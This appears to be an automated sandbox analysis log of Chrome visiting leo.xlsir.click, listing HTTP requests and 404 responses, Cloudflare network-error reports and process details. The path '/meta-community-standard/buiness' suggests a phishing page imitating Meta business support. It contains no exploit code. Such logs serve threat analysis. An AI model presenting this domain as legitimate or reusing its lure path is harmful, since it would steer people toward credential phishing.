2024-05-27 22:35:42 UTC	591	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 22:35:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-powered-by: DLEMP CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvaBXLWVPTJsCPlrMIWzj%2FjXHLmmtdgjQgc1BtN1TvOGO4rVuhkMp2SBXncL%2FhnqV0uQRb090ZRw8G3m01%2BKvb1kdr5T%2FhIHIexJexBO5%2FzXYFISS1uDsRcF2rO6PDfNrTs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97ac0698b431b-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:42 UTC	555	IN	Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-05-27 22:35:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:42 UTC	617	OUT	GET /favicon.ico HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://leo.xlsir.click/meta-community-standard/buiness Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:43 UTC	617	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 22:35:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-powered-by: DLEMP Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZOAJGekKSXVt8VxcIJwJZ7wI7ApqgCnVBG4TNsV7%2F3ZqmZVLIS%2FsZT9TejGL72tcgE6WgUqgICNMTEITta9QAZziTASh3SVfKCZJj6xrvc5Hy1Cq8%2BW8itpeBe93qej7nA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97ac88b738cb3-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:43 UTC	555	IN	Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-05-27 22:35:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:36:32 UTC	536	OUT	OPTIONS /report/v4?s=WZOAJGekKSXVt8VxcIJwJZ7wI7ApqgCnVBG4TNsV7%2F3ZqmZVLIS%2FsZT9TejGL72tcgE6WgUqgICNMTEITta9QAZziTASh3SVfKCZJj6xrvc5Hy1Cq8%2BW8itpeBe93qej7nA%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://leo.xlsir.click Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:36:32 UTC	336	IN	HTTP/1.1 200 OK content-length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Mon, 27 May 2024 22:36:31 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:36:32 UTC	479	OUT	POST /report/v4?s=WZOAJGekKSXVt8VxcIJwJZ7wI7ApqgCnVBG4TNsV7%2F3ZqmZVLIS%2FsZT9TejGL72tcgE6WgUqgICNMTEITta9QAZziTASh3SVfKCZJj6xrvc5Hy1Cq8%2BW8itpeBe93qej7nA%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 1803 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:36:32 UTC	1803	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 35 39 34 38 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 36 31 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 65 6f 2e 78 6c 73 69 72 2e 63 6c 69 63 6b 2f 68 6f 6d 65 2e 70 68 70 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 36 2e 31 36 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d Data Ascii: [{"age":59482,"body":{"elapsed_time":1618,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://leo.xlsir.click/home.php","sampling_fraction":1.0,"server_ip":"172.67.156.167","status_code":404,"type":"http.error"},"type":"network-
2024-05-27 22:36:32 UTC	168	IN	HTTP/1.1 200 OK content-length: 0 date: Mon, 27 May 2024 22:36:32 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	18:35:07
Start date:	27/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false